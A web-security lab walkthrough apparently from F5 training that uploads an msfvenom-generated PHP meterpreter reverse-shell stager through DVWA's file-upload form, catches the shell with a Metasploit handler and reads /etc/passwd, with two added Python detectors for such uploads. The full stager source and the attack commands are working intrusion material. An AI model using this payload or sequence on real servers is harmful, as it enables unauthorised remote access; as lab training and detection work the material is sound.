How to Upload a Shell to a Website Metasploit

Exercise 2: Exploiting a Web Server

This exercise uses some of the basic functions of the DVWA web site to demonstrate how to hack through the site itself. An attacker would use this as a means of circumventing your perimeter to gain access to your applications, servers, and data.

We will start by creating a pre-canned piece of PHP code that we will upload to the web server through the upload function on DVWA. For this exercise you will need to locate the external IP for your Kali server. This IP is generated dynamically for each student, but we have written a script and an iRule on the CTF server to return the IP address you'll need.

On the Kali server, run the following:

    $ msfvenom -p php/meterpreter/reverse_tcp lport=4444 -f raw lhost=`curl -k https://ctf.f5lab.biz/whatismyip`
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100    14  100    14    0     0    492      0 --:--:-- --:--:-- --:--:--   518
    No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    No Arch selected, selecting Arch: php from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 950 bytes

    /*<?php /**/ error_reporting(0); $ip = '<YOUR-IP>'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

Highlight the section of code that was generated, from the /*<?php to the final die();

Open a Command Prompt on the Windows PC. In the command prompt, type:

    cd Desktop
    notepad hackdvwa.php


In Notepad, paste the copied code, then save and close the file.


Open a Web Browser and go to https://dvwa.vlab.f5demo.com

Log in with admin / password

Choose the Upload menu on the lower left


Click Choose File, select the hackdvwa.php file you just created on the Desktop, and click Upload


The file is then posted to the server and its location is displayed for you as confirmation. You can copy this and paste it at the end of the URL in the browser.

In the browser, visit that file's location: http://dvwa.vlab.f5demo.com/hackable/uploads/hackdvwa.php

This will actually fail and you should see a "no socket" message, because nothing is listening yet; we'll set that up next.
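From the defender's side, the sequence just performed (a POST to the upload form, then a request for a .php file under the uploads directory from the same client) is visible in the web server's access log. The following is an added example, not part of the lab, that correlates those two events over constructed log lines; it assumes DVWA's upload form lives at /vulnerabilities/upload/ and uses the /hackable/uploads/ path shown on this page.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line; timestamps look like 19/Jun/2017:09:11:52 -0400
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_FORM = "/vulnerabilities/upload/"   # assumption: DVWA's upload page path
UPLOAD_DIR = "/hackable/uploads/"          # the directory shown in the lab's URL and listing
WINDOW = timedelta(minutes=10)             # how long after a POST a fetch of the file still counts


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}


def find_upload_then_execute(lines):
    """Alert when a client POSTs to the upload form and then requests a .php name under the uploads
    directory within WINDOW. A name merely containing '.php' is flagged so double extensions count."""
    last_post = {}   # client ip -> time of its most recent upload POST
    alerts = []
    for raw in lines:
        e = parse_line(raw)
        if e is None:
            continue
        if e["method"] == "POST" and e["path"].startswith(UPLOAD_FORM):
            last_post[e["ip"]] = e["ts"]
        elif e["path"].startswith(UPLOAD_DIR) and ".php" in e["path"].lower():
            posted = last_post.get(e["ip"])
            if posted is not None and e["ts"] - posted <= WINDOW:
                alerts.append((e["ip"], e["path"], e["ts"].isoformat()))
    return alerts


# Constructed sample lines (not real traffic) reproducing the lab flow: form, POST, then the fetch
# that returns the 9-byte "no socket" body. The last line is an unrelated image request.
SAMPLE_LOG = [
    '10.1.10.50 - - [19/Jun/2017:09:11:40 -0400] "GET /vulnerabilities/upload/ HTTP/1.1" 200 4512 "-" "Mozilla/5.0"',
    '10.1.10.50 - - [19/Jun/2017:09:11:52 -0400] "POST /vulnerabilities/upload/ HTTP/1.1" 200 4620 "-" "Mozilla/5.0"',
    '10.1.10.50 - - [19/Jun/2017:09:12:10 -0400] "GET /hackable/uploads/hackdvwa.php HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
    '10.1.10.77 - - [19/Jun/2017:09:12:30 -0400] "GET /hackable/uploads/dvwa_email.png HTTP/1.1" 200 667 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, when in find_upload_then_execute(SAMPLE_LOG):
        print(f"ALERT {when}: {ip} uploaded and then requested {path}")
```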

Back in the Kali ssh session, we will set up the listener that the web server will connect to.

If you're not inside msfconsole anymore, start it:

Now we want to choose an exploit to run.

    msf > use exploit/multi/handler

To see what is selected for this exploit by default, type:

    msf > options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------

    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target

This selects the exploit we'll run in Metasploit. Next, set the payload:

                msf > set payload php/meterpreter/reverse_tcp              

To see the options for this payload, type:

    msf > options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------

    Payload options (php/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address
       LPORT  4444             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target

This chooses the actual payload we're going to send through the exploit, and we'll set some parameters for it. To see the options:

    msf exploit(handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp

    msf exploit(handler) > show options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------

    Payload options (php/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address
       LPORT  4444             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target

Set the options as follows:

    msf > set lhost 10.1.10.240
    msf > set lport 4444

lhost and lport

These options are the 'local' listening IP and port for the handler. Note that the IP here is the internal NAT'd IP address, whereas in the PHP code above you entered the external NAT'd address; the two must refer to the same listener or the uploaded code will never reach it.

Return to your web browser on the Windows PC and refresh the page.

Now we can start the listener:

exploit

Exploit is the fun command… here we are running the exploit we want to see. You can also use run, but exploit is so much more Hacker.

After a few seconds, you should see:

    [*] Started reverse TCP handler on 10.1.10.240:4444
    [*] Starting the payload handler...
    [*] Sending stage (33986 bytes) to <YOURIP>
    [*] Meterpreter session 3 opened (10.1.10.240:4444 -> <IP>:PORT) at <DATE>

Then, a moment or two later:

Meterpreter

Meterpreter is the "Swiss Army Knife" of the Metasploit Framework. You can open a Meterpreter console through an exploit, like we just did. In this instance, we set Metasploit to listen for incoming traffic on port 4444 on our NAT'd internet address. We had to do this because the DMZ address isn't reachable from the web server, but the web server is allowed to connect out to the internet. We then ran the uploaded PHP code we generated, which opens the connection back to the listener, and now we're able to run commands on the web server as though we had an ssh-like connection.

Let's examine the web server to see what we can discover.

In the Meterpreter shell, type:

We can see the following:

    meterpreter > dir
    Listing: /var/www/dvwa/hackable/uploads
    =======================================

    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    100644/rw-r--r--  667   fil   2013-07-08 12:55:06 -0400  dvwa_email.png
    100644/rw-r--r--  950   fil   2017-06-19 09:11:52 -0400  hackdvwa.php
    100644/rw-r--r--  951   fil   2017-06-14 13:50:15 -0400  hackme.php.txt
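That listing is exactly what a defender should be watching: an uploads directory that the web server will happily execute from. The following is an added example, not part of the lab, that inspects every file in such a directory by content rather than extension, keying off the shape of the stager generated earlier on this page (an open tag that need not be at byte 0, an outbound socket call, and eval()). The demo directory it builds contains constructed sample files named after the listing above, not the lab's real files.

```python
import os
import re
import tempfile

# Indicators drawn from the shape of the stager generated earlier on this page: a PHP open tag
# that need not sit at byte 0, an outbound socket function, and eval().
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
SOCKET_FUNCS = re.compile(
    rb"\b(stream_socket_client|fsockopen|socket_create|socket_connect)\s*\(", re.IGNORECASE)
EVAL_CALL = re.compile(rb"\beval\s*\(", re.IGNORECASE)


def classify_upload(data: bytes) -> list:
    """Return the indicators found in one file's bytes; an empty list means nothing suspicious."""
    hits = []
    if PHP_OPEN_TAG.search(data):
        hits.append("php_open_tag")
    if SOCKET_FUNCS.search(data):
        hits.append("socket_function")
    if EVAL_CALL.search(data):
        hits.append("eval")
    return hits


def scan_uploads_dir(path: str) -> dict:
    """Walk an uploads directory; return {relative name: indicators} for every flagged file.
    Bytes are inspected regardless of extension, so hackme.php.txt is judged by content too."""
    flagged = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                hits = classify_upload(fh.read(256 * 1024))  # a stager fits in the first 256 KiB
            if hits:
                flagged[os.path.relpath(full, path)] = hits
    return flagged


def build_demo_dir() -> str:
    """Create a constructed uploads directory mirroring the listing above (sample files, not the lab's)."""
    d = tempfile.mkdtemp(prefix="uploads_")
    with open(os.path.join(d, "dvwa_email.png"), "wb") as fh:   # genuine PNG header, no PHP: not flagged
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    with open(os.path.join(d, "hackdvwa.php"), "wb") as fh:     # constructed fragment with the stager's shape
        fh.write(b"/*<?php /**/ error_reporting(0); $s = fsockopen($ip, $port); eval($b); die();")
    with open(os.path.join(d, "hackme.php.txt"), "wb") as fh:   # PHP hidden behind a .txt extension
        fh.write(b"<?php echo 'hello'; ?>")
    return d
```

Running `scan_uploads_dir(build_demo_dir())` flags hackdvwa.php on all three indicators and hackme.php.txt on the open tag alone, while the PNG passes; in practice the same check belongs in the upload handler before the file is written, with the directory denied script execution as a second layer.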

We can see what accounts are on this server by typing:

                meterpreter > cat /etc/passwd              

To see a list of the commands that are available to you, you can type help at any point.

Feel free to investigate the web server; when you're finished, type exit and the Meterpreter shell will close.

Note that when you close the session, the web page finally stops spinning.


Source: https://f5-agility-labs-waf.readthedocs.io/en/latest/class2/module1/lab2.html
